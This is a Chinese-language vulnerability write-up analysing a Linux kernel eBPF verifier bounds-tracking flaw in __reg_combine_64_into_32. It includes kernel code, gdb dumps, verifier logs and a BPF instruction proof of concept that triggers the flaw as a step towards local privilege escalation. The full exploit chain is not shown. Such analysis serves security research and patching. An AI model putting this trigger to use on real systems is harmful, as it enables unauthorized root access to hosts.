前言
这个洞我在年初时发现的,因为能提权便留在手中,结果不幸被Pwn2Own给撞了,现在ZDI官方博客也出了分析,我就将之前自己记录的分析发一下。当时发现这个洞,是看到下面commit修复的一个漏洞:
补丁解释如下:
bpf: Fix propagation of 32-bit signed bounds from 64-bit bounds.
The 64-bit signed bounds should not affect 32-bit signed bounds unless the
verifier knows that upper 32-bits are either all 1s or all 0s. For example the
register with smin_value==1 doesn't mean that s32_min_value is also equal to 1,
since smax_value could be larger than 32-bit subregister can hold.
The verifier refines the smax/s32_max return value from certain helpers in
do_refine_retval_range(). Teach the verifier to recognize that smin/s32_min
value is also bounded. When both smin and smax bounds fit into 32-bit
subregister the verifier can propagate those bounds.
漏洞代码认为有符号64位最小值为1时,32位最小值也为1,其实不一定,64位的最小值和32位的最小值并一定相等,两者并没有关系。例如64位有符号数的最小值为0x1ffffffff,而32位最小值就为-1了。可以联想到无符号数也是这种情况,比如无符号64位最小值也不一定等于32位无符号的最小值,例如64位无符号的最小值为0x100000000,32位无符号的最小值就为0。但看了代码,发现但开发者并没有补,这漏洞本质原因是对64位范围的判断影响到了32位范围。
漏洞影响
影响Linux kernel 5.7 及以上
目前还影响最新版的Ubuntu 20.04/20.10,应该还有其它发行版,没有一一测试了。
漏洞分析
漏洞调用链如下:
#0 __reg32_deduce_bounds (reg=reg@entry=0xffff88801f9b0800) at kernel/bpf/verifier.c:1254
#1 0xffffffff81157c67 in __reg_deduce_bounds (reg=0xffff88801f9b0800) at kernel/bpf/verifier.c:1387
#2 __reg_combine_64_into_32 (reg=reg@entry=0xffff88801f9b0800) at kernel/bpf/verifier.c:1387
#3 0xffffffff8115818d in reg_set_min_max (true_reg=0xffff88801f9b2000, false_reg=false_reg@entry=0xffff88801f9b0800, val=<optimized out>, val32=2415919103,
opcode=opcode@entry=176 '\260', is_jmp32=is_jmp32@entry=false) at kernel/bpf/verifier.c:7750
#4 0xffffffff81166397 in check_cond_jmp_op (insn_idx=0xffff88800324e000, insn=0xffffc9000002d0e8, env=0xffff88800324e000) at kernel/bpf/verifier.c:8142
#5 do_check (env=0xffff88800324e000) at kernel/bpf/verifier.c:10169
#6 do_check_common (env=env@entry=0xffff88800324e000, subprog=subprog@entry=0) at kernel/bpf/verifier.c:12042
#7 0xffffffff81169909 in do_check_main (env=0xffff88800324e000) at kernel/bpf/verifier.c:12108
漏洞点在于__reg_combine_64_into_32 函数:
static void __reg_combine_64_into_32(struct bpf_reg_state *reg)
{
__mark_reg32_unbounded(reg);
if (__reg64_bound_s32(reg->smin_value) && __reg64_bound_s32(reg->smax_value)) {
reg->s32_min_value = (s32)reg->smin_value;
reg->s32_max_value = (s32)reg->smax_value;
}
if (__reg64_bound_u32(reg->umin_value))
reg->u32_min_value = (u32)reg->umin_value;
if (__reg64_bound_u32(reg->umax_value))
reg->u32_max_value = (u32)reg->umax_value;
/* Intersecting with the old var_off might have improved our bounds
* slightly. e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
* then new var_off is (0; 0x7f...fc) which improves our umax.
*/
__reg_deduce_bounds(reg);
__reg_bound_offset(reg);
__update_reg_bounds(reg);
}
构造Poc来验证:
BPF_LD_MAP_FD(BPF_REG_9,exp_mapfd),
BPF_MAP_GET(0,BPF_REG_5),
BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),
BPF_MOV64_REG(BPF_REG_0, BPF_REG_5),
BPF_JMP_IMM(BPF_JSGE, BPF_REG_0, 1, 1),
BPF_EXIT_INSN(),
BPF_LD_IMM64(BPF_REG_2, 0x8fffffff),
BPF_JMP_REG(BPF_JGT, BPF_REG_0, BPF_REG_2, 1),
BPF_EXIT_INSN(),
BPF_MOV32_REG(BPF_REG_0, BPF_REG_0),
BPF_ALU32_IMM(BPF_ADD, BPF_REG_0, 0x70000000),
BPF_ALU64_IMM(BPF_RSH, BPF_REG_0, 31),
在未经过BPF_JMP_REG(BPF_JGT, BPF_REG_0, BPF_REG_2, 1),
, 条件比较之前,r0寄存器的状态如下:
(gdb) p/x *reg
$5 = {type = 0x1, off = 0x0, {range = 0x0, map_ptr = 0x0, {btf = 0x0, btf_id = 0x0}, mem_size = 0x0, raw = {raw1 = 0x0, raw2 = 0x0}}, id = 0x2, ref_obj_id = 0x0,
var_off = {value = 0x0, mask = 0x7fffffffffffffff}, smin_value = 0x1, smax_value = 0x7fffffffffffffff, umin_value = 0x1, umax_value = 0x7fffffffffffffff,
s32_min_value = 0x80000000, s32_max_value = 0x7fffffff, u32_min_value = 0x0, u32_max_value = 0xffffffff, parent = 0xffff88801f9b2000, frameno = 0x0, subreg_def = 0x0,
live = 0x0, precise = 0x1}
进行比较时,在__reg_combine_64_into_32函数中修改了u32_min_value 的值:
static void __reg_combine_64_into_32(struct bpf_reg_state *reg)
{
__mark_reg32_unbounded(reg);
if (__reg64_bound_s32(reg->smin_value) && __reg64_bound_s32(reg->smax_value)) {
reg->s32_min_value = (s32)reg->smin_value;
reg->s32_max_value = (s32)reg->smax_value;
}
if (__reg64_bound_u32(reg->umin_value)) // <------ [1]
reg->u32_min_value = (u32)reg->umin_value;
if (__reg64_bound_u32(reg->umax_value)) // <------ [2]
reg->u32_max_value = (u32)reg->umax_value; //更深的成因在于这里没有限制住reg->umax_value,如果大于0xffffffff,到__reg_deduce_bounds函数里就会造成一种类似截断的效果,变成reg->u32_max_value=0xffffffff的范围,所以补丁应该像上述有符号的操作一样,使用&&操作进行判断
// 只有最大值在32位的范围内,64位的最小值才是32位的最小值
/* Intersecting with the old var_off might have improved our bounds
* slightly. e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
* then new var_off is (0; 0x7f...fc) which improves our umax.
*/
__reg_deduce_bounds(reg);
__reg_bound_offset(reg);
__update_reg_bounds(reg);
}
修改成了:
(gdb) p/x *reg
$7 = {type = 0x1, off = 0x0, {range = 0x0, map_ptr = 0x0, {btf = 0x0, btf_id = 0x0}, mem_size = 0x0, raw = {raw1 = 0x0, raw2 = 0x0}}, id = 0x2, ref_obj_id = 0x0,
var_off = {value = 0x0, mask = 0x7fffffffffffffff}, smin_value = 0x1, smax_value = 0x7fffffffffffffff, umin_value = 0x90000000, umax_value = 0x7fffffffffffffff,
s32_min_value = 0x80000000, s32_max_value = 0x7fffffff, u32_min_value = 0x90000000, u32_max_value = 0xffffffff, parent = 0xffff88801f9b2000, frameno = 0x0,
subreg_def = 0x0, live = 0x0, precise = 0x1}
__reg_combine_64_into_32
函数中的 [1]处认为reg->umin_value 在32位的范围内,就将reg->u32_min_value 设为 (u32)reg->umin_value; 导致reg->u32_min_value=0x90000000,[2]处导致reg->u32_max_value=0xffffffff, 而后经过__reg32_deduce_bounds 函数:
static void __reg32_deduce_bounds(struct bpf_reg_state *reg)
{
/* Learn sign from signed bounds.
* If we cannot cross the sign boundary, then signed and unsigned bounds
* are the same, so combine. This works even in the negative case, e.g.
* -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
*/
if (reg->s32_min_value >= 0 || reg->s32_max_value < 0) {
reg->s32_min_value = reg->u32_min_value =
max_t(u32, reg->s32_min_value, reg->u32_min_value);
reg->s32_max_value = reg->u32_max_value =
min_t(u32, reg->s32_max_value, reg->u32_max_value);
return;
}
/* Learn sign from unsigned bounds. Signed bounds cross the sign
* boundary, so we must be careful.
*/
if ((s32)reg->u32_max_value >= 0) {
/* Positive. We can't learn anything from the smin, but smax
* is positive, hence safe.
*/
reg->s32_min_value = reg->u32_min_value;
reg->s32_max_value = reg->u32_max_value =
min_t(u32, reg->s32_max_value, reg->u32_max_value);
} else if ((s32)reg->u32_min_value < 0) { //<----- [1]
/* Negative. We can't learn anything from the smax, but smin
* is negative, hence safe.
*/
reg->s32_min_value = reg->u32_min_value =
max_t(u32, reg->s32_min_value, reg->u32_min_value); // <----- [2]
reg->s32_max_value = reg->u32_max_value;
}
}
[1] 处由于(s32)reg->u32_min_value=(s32)0x90000000 < 0 进入判断,在[2]处对reg->s32_min_value进行赋值,reg->s32_min_value之前的值为0x80000000,取最大值reg->s32_min_value=0x90000000 ,reg->s32_max_value=0xffffffff,而条件判断:if r0 <= r2(0x8fffffff) 是64位操作数的比较,32位操作数的范围是不确定的,但现在32位却得到范围[0x90000000, 0xffffffff],最终我们通过w0=w0单独取出32位进行操作,导致检查范围出现错误,进而提权。
漏洞根本成因在于__reg_combine_64_into_32 对于范围的操作,通过64位的范围影响到了32位的范围。
检查过程如下:
12: (bf) r0 = r5 // r5 为map传进来的数
13: R0_w=invP(id=0) R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
13: (75) if r0 s>= 0x1 goto pc+1 // 对1进行有符号比较
R0_w=invP(id=0,smax_value=0) R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
14: R0_w=invP(id=0,smax_value=0) R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
14: (95) exit
15: R0_w=invP(id=0,umin_value=1,umax_value=9223372036854775807,var_off=(0x0; 0x7fffffffffffffff)) R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
15: (18) r2 = 0x8fffffff // 此时认为r0的范围为:[1,0x7fffffffffffffff]
17: R0_w=invP(id=0,umin_value=1,umax_value=9223372036854775807,var_off=(0x0; 0x7fffffffffffffff)) R2_w=invP2415919103 R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
17: (2d) if r0 > r2 goto pc+1 // 此时对r2进行无符号比较
R0_w=invP(id=0,umin_value=1,umax_value=2415919103,var_off=(0x0; 0xffffffff)) R2_w=invP2415919103 R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
18: R0_w=invP(id=0,umin_value=1,umax_value=2415919103,var_off=(0x0; 0xffffffff)) R2_w=invP2415919103 R5_w=invP(id=0) R7_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
18: (95) exit // 得到r2的64位范围为[0x90000000,0x7fffffffffffffff],32位范围为:[0x90000000, 0xffffffff],这里检查就出现了错误:64位操作数的比较,32位的范围应该是不清楚的,但却得到范围[0x90000000, 0xffffffff],只要传进来的数32位部分不在此范围,就可以触发漏洞
19: R0=invP(id=0,umin_value=2415919104,umax_value=9223372036854775807,var_off=(0x80000000; 0x7fffffff7fffffff),s32_min_value=-1879048192,s32_max_value=-1) R2=invP2415919103 R5=invP(id=0) R7=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
19: (bc) w0 = w0 // 对64位进行截断,只看32位部分,范围依旧是[0x90000000, 0xffffffff]
20: R0_w=invP(id=0,smin_value=0,umin_value=2415919104,umax_value=4294967295,var_off=(0x80000000; 0x7fffffff),s32_min_value=-1879048192,s32_max_value=-1) R2=invP2415919103 R5=invP(id=0) R7=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
20: (04) w0 += 1879048192 // w0+=0x70000000,得到范围为[0,0x6fffffff]
21: R0_w=invP(id=0,umax_value=1879048191,var_off=(0x0; 0x7fffffff)) R2=invP2415919103 R5=invP(id=0) R7=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
21: (77) r0 >>= 31 // 右移31位,取32位范围的符号位,因为认为范围是[0,0x6fffffff],所以结果恒为0
22: R0_w=invP0 R2=invP2415919103 R5=invP(id=0) R7=map_value(id=0,off=0,ks=4,vs=256,imm=0) R8=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-8=mmmm????
而实际运行过程:
12: (bf) r0 = r5 // 传进r5=0x180000000
13: (75) if r0 s>= 0x1 goto pc+1 // r0 >= 0x1, 跳转
14: (95) exit
15: (18) r2 = 0x8fffffff
17: (2d) if r0 > r2 goto pc+1 // r0 > 0x8fffffff,跳转
18: (95) exit
19: (bc) w0 = w0 // 截断,w0 = 0x80000000
20: (04) w0 += 1879048192 // w0+=0x70000000=0xf0000000
21: (77) r0 >>= 31 // r0 >>= 31 = 0xf0000000 >> 31 = 1
所以最终检查认为r0为0,而实际运行r0为1,参照eBPF的漏洞利用,可以完成提权,但现在eBPF模块对越界读写问题开始重新检查,会影响提权利用,在Pwn2Own 2021之后的利用得对这些检查进行绕过。
最新版Ubuntu 20.10 利用效果图: